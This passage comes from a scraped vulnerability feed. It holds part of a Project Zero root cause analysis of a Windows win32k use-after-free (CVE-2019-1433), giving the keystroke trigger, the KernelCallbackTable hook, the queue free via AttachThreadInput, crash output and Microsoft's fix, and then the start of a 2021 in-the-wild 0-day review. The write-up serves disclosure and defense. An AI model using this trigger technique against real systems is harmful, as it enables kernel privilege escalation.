symbols for the function names in my IDA databases, but for the vast majority of functions, this didn\u2019t include type information. To begin finding type information, I started googling for different function names or variable names. While it didn\u2019t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA.\n\n** \n**\n\nFor example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground \u2192 global, pointer to queue (tagQ *), gptiCurrent \u2192 global, pointer to thread info (tagTHREADINFO *).\n\n** \n**\n\nThis was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it\u2019s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ.\n\n** \n**\n\nAt this point, I was pretty sure I had found the vulnerability (\ud83d\ude09), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability. As a side note, for the reversing, I found that the HexRays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view.\n\n## RESOURCES\n\nHere are some of the resources that were critical for me:\n\n * \u201cKernel Attacks Through User- Mode Callbacks\u201d Blackhat USA 2011 talk by Tarjei Mandt [[slides](<http://mista.nu/research/mandt-win32k-slides.pdf>), video]\n\n * I learned about thread locking, assignment locking, and user-mode callbacks.\n\n * \u201cOne Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild\u201d by Jack Tang, Trend Micro Security Intelligence [[blog](<https://blog.trendmicro.com/trendlabs-security-intelligence/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild/>)]\n\n * This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions.\n\n * \u201cKernel exploitation \u2013 r0 to r3 transitions via KeUserModeCallback\u201d by Mateusz Jurczyk [[blog](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>)]\n\n * This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback.\n\n * \u201cWindows Kernel Reference Count Vulnerabilities - Case Study\u201d by Mateusz Jurczyk, Zero Nights 2012 [[slides](<https://j00ru.vexillium.org/slides/2012/zeronights.pdf>)]\n\n * \u201cAnalyzing local privilege escalations in win32k\u201d by mxatone, Uninformed v10 (10/2008) [[article](<http://uninformed.org/?v=10&a=2>)]\n\n * P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes\n\n# TIMELINE\n\n * Oct 31 2019: Chrome releases fix for CVE-2019-13720\n\n * Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458 as exploited in the wild and fixed in the December updates. \n\n * Dec 10-16 2019: I ask around for a copy of the exploit. No luck!\n\n * Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.)\n\n * Dec 23 2019: VM is set-up. Start patch diffing\n\n * Dec 24-Jan 2: Holiday\n\n * Jan 2 - Jan 3: Look at other diffs that weren\u2019t the vulnerability. Try to trigger DrawSwitchWndHilite\n\n * Jan 6: Realize changes to xxxKeyEvent and xxxNextWindow is the correct change. (Note dear reader, this is not in fact the \u201ccorrect change\u201d.)\n\n * Jan 6-Jan16: Figure out how the vulnerability works, go down random rabbit holes, work on POC.\n\n * Jan 16: Crash POC crashes!\n\n** \n**\n\nApproximately 3 work weeks to set up a test environment, diff patches, and create crash POC. \n\n# CVE-2019-1458 CVE-2019-1433 ROOT CAUSE ANALYSIS\n\nBug class: use-after-free\n\n** \n**\n\n## OVERVIEW\n\nThe vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user-mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor xxxNextWindow lock the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after free.\n\n## DETAILED WALK THROUGH\n\nThis section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section. The Windows 7 crash POC that I developed is available [here](<https://drive.google.com/file/d/1V9HHljjRq17hnfqasExnCiGCJLkt0aOX/view>).\n\n### ANALYZED SAMPLES\n\nI did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the \u201cMy Process\u201d section.\n\n** \n**\n\nVulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256)\n\nPatched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256)\n\n** \n**\n\n### OVERVIEW\n\nThis walk through is broken up into the following sections to describe the vulnerability:\n\n * Triggering xxxNextWindow\n\n * Freeing the tagQ (queue) structure\n\n * User-mode callback xxxMoveSwitchWndHilite\n\n * Using the freed queue\n\n### TRIGGERING xxxNextWindow\n\nThe code path is triggered by a special set of keyboard inputs to open a \u201cSticky Task Switcher\u201d window. As a side note, I didn\u2019t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API: \n\n\n<ALT (Extended)> \\+ TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See triggerNextWindow function in POC). \n\n** \n**\n\nThe \u201cnormal\u201d way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for \u201csticky\u201d. However, this window won\u2019t hit the vulnerable code path, xxxNextWindow. The \u201cnormal\u201d task switching window, shown below, looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the \u201cnormal\u201d task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that. \n \n \n\n\n[](<https://1.bp.blogspot.com/-o4XFRI3CfJE/Xpto6UevWII/AAAAAAAAPh0/HCRz20rFYRgjy6QGC9m1uvKdadZU-uh5ACNcBGAsYHQ/s1600/6_NormalTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n \n\n\n\"Normal\" task switch window\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-RJX4C9GRLdU/Xpto6mHp-YI/AAAAAAAAPh4/yWKpyz52hY0VX6rL7NgS8gvZR2H9mr1vgCNcBGAsYHQ/s1600/7_NextWindowTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n\n\nWindow that is displayed when xxxNextWindow is called\n\n \nIf this is the first \u201ctab press\u201d then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached. \n\n** \n**\n\n### FREEING THE QUEUE in xxxNextWindow\n\nxxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function. \n\n** \n**\n\nAt LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-callback mode is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window. \n\n** \n**\n\nvoid __fastcall xxxNextWindow(tagQ *queue, int a2) {\n\n[...]\n\n \n\n\nV43 = 0;\n\nwhile ( 1 ) {\n\nif (gspwndAltTab->fnid & 0x3FFF == 0x2A0 &&\n\ngspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&\n\ngspwndAltTab->bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64;\n\nif ( !v45 ) {\n\nThreadUnlock1();\n\ngoto LABEL_106;\n\n}\n\nhandleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); \u2190 USER MODE CALLBACK\n\nif ( v43 )\n\n{\n\nif ( v43 == handleOfNextWindowToHilite ) {\n\nv48 = 0i64;\n\nLABEL_103:\n\nThreadUnlock1();\n\nHMAssignmentLock(&gspwndActivate, v48);\n\nif ( !*(_QWORD *)&gspwndActivate )\n\nxxxCancelCoolSwitch();\n\nreturn;\n\n}\n\n} else { v43 = handleOfNextWindowToHilite; }\n\ntagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW);\n\nif ( tagWndPtrOfNextWindow )\n\ngoto LABEL_103;\n\nisShiftPressed2 = isShiftPressed;\n\n}\n\n \n\n\n[...]\n\n \n\n\nLABEL_106:\n\nv11 = queue->spwndActive; \u2190 USE AFTER FREE\n\nif ( v11 || (v11 = queue->ptiKeyboard->rpdesk->pDeskInfo->spwnd->spwndChild) != 0i64 ) {\n\n \n\n\n[...] \n \n--- \n \n** \n**\n\n#### USER-MODE CALLBACK in xxxMoveSwitchWndHilite\n\nThere are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite.\n\n** \n**\n\nThis call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback.\n\n** \n**\n\nxxxMoveSwitchWndHilite sends message 0x8C which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it\u2019s not expected that user applications will respond to this message. Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented [here](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>). \n\n** \n**\n\nIn the callback, we free the tagQ structure using [AttachThreadInput](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-attachthreadinput>). AttachThreadInput \u201cattaches the input processing mechanism of one thread to that of another thread\u201d and to do this, it destroys the queue of the thread that is being attached to another thread\u2019s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue:\n\n 1. xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we\u2019ll loop back to the top of the while loop.\n\n 2. Once we\u2019re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn\u2019t work because this window is a special system class (fnid == 0x2A0). Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue.\n\n** \n**\n\nif (gspwndAltTab->fnid & 0x3FFF == 0x2A0 &&\n\ngspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&\n\ngspwndAltTab->bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64; \n \n--- \n \n** \n**\n\n### USING THE FREED QUEUE\n\nOnce v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer so we dereference it and move it into r14. Therefore we now have a use-after-free.\n\n** \n**\n\n## WINDOWS 10 \n\nCVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903.\n\n** \n**\n\nVulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256)\n\nPatched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256)\n\n** \n**\n\nI confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash.\n\n** \n**\n\n*******************************************************************************\n\n* *\n\n* Bugcheck Analysis *\n\n* *\n\n*******************************************************************************\n\n \n\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\n \n\n\nFAULTING_IP:\n\nwin32kfull!xxxNextWindow+743\n\nffff89ba`965f553b 4d8bbd80000000 mov r15,qword ptr [r13+80h]\n\n \n\n\n# Child-SP RetAddr Call Site\n\n00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus\n\n01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12\n\n02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952\n\n03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107\n\n04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933\n\n05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f\n\n06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360 \n\n07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 \u2190 UAF\n\n08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005\n\n09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b\n\n0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5\n\n0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5\n\n0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab\n\n0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4\n\n0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3\n\n0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d\n\n10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25\n\n11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14\n\n12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335 <\\- My POC\n\n13 0000002b2a5ffc10 00007ffb7f86ced1 KERNEL32!BaseThreadInitThunk+0x14\n\n14 0000002b2a5ffc40 0000000000000000 ntdll!RtlUserThreadStart+0x21\n\n \n\n\nBUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202 \n \n--- \n \n** \n**\n\nTo trigger the crash, I only had to change two things in the Windows 7 POC:\n\n 1. The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch Window). It is possible to do this programmatically, I just didn\u2019t take the time to code it up.\n\n 2. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable.\n\n** \n**\n\nIt took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run). \n\n[](<https://1.bp.blogspot.com/-DD9YxDSuvMo/Xpto6z2kcgI/AAAAAAAAPh8/Fl0ZjWF3vP4BGzmFhGrFkWBk_QKLfAhZwCNcBGAsYHQ/s1600/8_SidebySideDisasm2%2B%25281%2529.png>) \n \n--- \n \nDisassembly at xxxNextWindow+737 in Oct 2019 Update\n\n| \n\nDisassembly at xxxNextWindow+73F in Nov 2019 Update \n \n** \n**\n\nThe fix in the November update for Windows 10 1903 is the same as the Windows 7 fix: \n\n * Add the UnlockQueue function.\n\n * Add locking around the call to xxxNextWindow.\n\n * Check the \u201cdestroyed\u201d bitflag in the tagQ struct before proceeding to use the queue. \n\n** \n**\n\n# FIXING THE VULNERABILITY\n\nTo patch the CVE-2019-1433 vulnerability, Microsoft changed four functions: \n\n * xxxNextWindow\n\n * xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10)\n\n * zzzDestroyQueue\n\n * UnlockQueue (new function)\n\n** \n**\n\nOverall, the changes are to prevent the queue structure from being freed and track if something attempted to destroy the queue. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects. \n\n** \n**\n\n## zzzDestroyQueue Patch\n\nThe only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags. \n\n\n \n\n\n \n\n\n[](<https://1.bp.blogspot.com/-AfAFuVQf9ik/Xpto7GVoiTI/AAAAAAAAPiA/gHmTpfZvZRYzVnJsQgfaYrzLKBPHbSuZQCNcBGAsYHQ/s1600/9_DestroyQueueBindiff%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Pre-Patch\n\n \n\n\n[](<https://1.bp.blogspot.com/-fqYi_u0Zxw8/Xpto7V4HOoI/AAAAAAAAPiE/Hu_tMFWdhnAMbn0CaOd4K_579uEBwQJMgCNcBGAsYHQ/s1600/A_DestroyQueueBindiff%25232%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Post-Patch\n\n \n\n\nxxxNextWindow Patch\n\nThere is a single change to the xxxNextWindow function as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added to xxxNextWindow+0x847 are as follows where rbp is the pointer to the tagQ structure.\n\n** \n**\n\nbt dword ptr [rbp+13Ch], 1Ah\n\njb loc_FFFFF9600017A0C9 \n \n--- \n \n** \n**\n\nIf the bit is set, the function exists. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed, but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base as described in the section above. \n\n** \n**\n\n[](<https://1.bp.blogspot.com/-BGo0hE2WvZE/Xpto7nBs7XI/AAAAAAAAPiI/hWcK8Db2YZ8yAtB4EOL_R0cHJtxfD-wEACNcBGAsYHQ/s1600/B_xxxNextWindowChanges%2B%25281%2529.png>)\n\n** \n**\n\n## xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch\n\nIn this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10. \n\n** \n**\n\nThe change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn\u2019t appear to be publicly documented by Microsoft. My understanding comes from Tarjei Mandt\u2019s 2011 Blackhat USA presentation, \u201c[Kernel Attacks through User-Mode Callbacks](<https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf>)\u201d. Thread locking is where objects are added to a thread\u2019s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread. \n\n** \n**\n\nThe new function, UnlockQueue, is used to unlock the queue. \n\n** \n**\n\nif ( !queue )\n\nqueue = gptiRit->pq;\n\nxxxNextWindow(queue, vkey_cp); \n \n--- \n \nxxxKeyEvent+92E Pre-Patch\n\n** \n**\n\nif ( !queue )\n\nqueue = gptiRit->pq;\n\n++queue->cLockCount;\n\ncurrWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62);\n\nthreadLockW32 = currWin32Thread->ptlW32;\n\ncurrWin32Thread->ptlW32 = (_TL *)&threadLockW32;\n\nqueueCp = queue;\n\nunlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue;\n\nxxxNextWindow(queue, vkey_cp);\n\ncurrWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64);\n\ncurrWin32Thread2->ptlW32 = threadLockW32;\n\nunlockQueueFnPtr(queueCp); \n \n--- \n \nxxxKeyEvent+94E Post-Patch\n\n** \n**\n\n# CONCLUSION\n\nSo...I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method, that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl [here](<https://github.com/piotrflorczyk/cve-2019-1458_POC>).\n\n** \n**\n\nIf I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn\u2019t have analyzed the wrong bug. This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn\u2019t get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles and that I can download additional updates from the Microsoft Update Catalog.\n\n** \n**\n\nAlthough this blog post didn\u2019t turn out how I originally planned, I decided to share it in the hopes that it\u2019d encourage others to explore a platform new to them. It\u2019s often not a straight path, but if you\u2019re interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug!\n\n** \n**\n\nI didn\u2019t initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing, but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit. Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience.\n\n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-04-02T00:00:00", "type": "googleprojectzero", "title": "\nTFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2019-1362", "CVE-2019-13720", "CVE-2019-1433", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-3568"], "modified": "2020-04-02T00:00:00", "id": "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7", "href": "https://googleprojectzero.blogspot.com/2020/04/tfw-you-get-really-excited-you-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T23:27:23", "description": "A Year in Review of 0-days Used In-the-Wild in 2021\n\nPosted by Maddie Stone, Google Project Zero\n\nThis is our third annual year in review of 0-days exploited in-the-wild [[2020](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>), [2019](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>)]. Each year we\u2019ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in the analysis of individual exploits, please check out our [root cause analysis repository](<https://googleprojectzero.blogspot.com/p/rca.html>).\n\nWe perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard [over](<https://forbiddenstories.org/about-the-pegasus-project/>) and [over](<https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/>) and [over](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>) about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans\u2019 lives.\n\nWe\u2019ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.\n\n# Executive Summary\n\n2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That\u2019s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We\u2019ve tracked publicly known in-the-wild 0-day exploits in [this spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) since mid-2014.\n\nWhile we often talk about the number of 0-day exploits used in-the-wild, what we\u2019re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.\n\nWith this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn\u2019t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero\u2019s mission is \u201cmake 0day hard\u201d. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.\n\nSo while we recognize the industry\u2019s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there\u2019s a lot more improving to be done. Having access to more \u201cground truth\u201d of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.\n\nWe had so many more data points in 2021 to learn about attacker behavior than we\u2019ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they\u2019re using or what percentage of 0-days we\u2019re missing in our tracking, so we\u2019ll never know exactly what proportion of 0-days are currently being found and disclosed publicly. \n\nBased on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:\n\n 1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.\n 2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.\n\n# A Record Year for In-the-Wild 0-days\n\n2021 was a record year for in-the-wild 0-days. So what happened?\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM4gCoxLJVRGTOOAa0G44m0K7JF0hFFDI02iBV7REJruq3uiZof8wNylU1aNxOte2oEhhj_5JM9tS0VOwgA-eiKIaQ_DdmTQtlC9OUKSRA6kes4_d_-BKyeZsJ2bxISU2HJmZRG-_kVtKguVM8-eo7mbHl1_zs8DUGnY5mD-BiWYz6ayl472_aq7G_wQ/s1200/image1.png>)\n\nIs it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.\n\nWhile we often talk about \u201c0-day exploits used in-the-wild\u201d, what we\u2019re actually tracking are \u201c0-day exploits detected and disclosed as used in-the-wild\u201d. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry. \n\nOverall, we can break down the uptick in the number of in-the-wild 0-days into:\n\n * More detection of in-the-wild 0-day exploits\n * More public disclosure of in-the-wild 0-day exploitation\n\n## More detection\n\nIn the [2019 Year in Review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we wrote about the \u201cDetection Deficit\u201d. We stated \u201cAs a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\u201d In the last two years, we believe that there\u2019s been progress on this gap. \n\nAnecdotally, we hear from more people that they\u2019ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we\u2019re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may 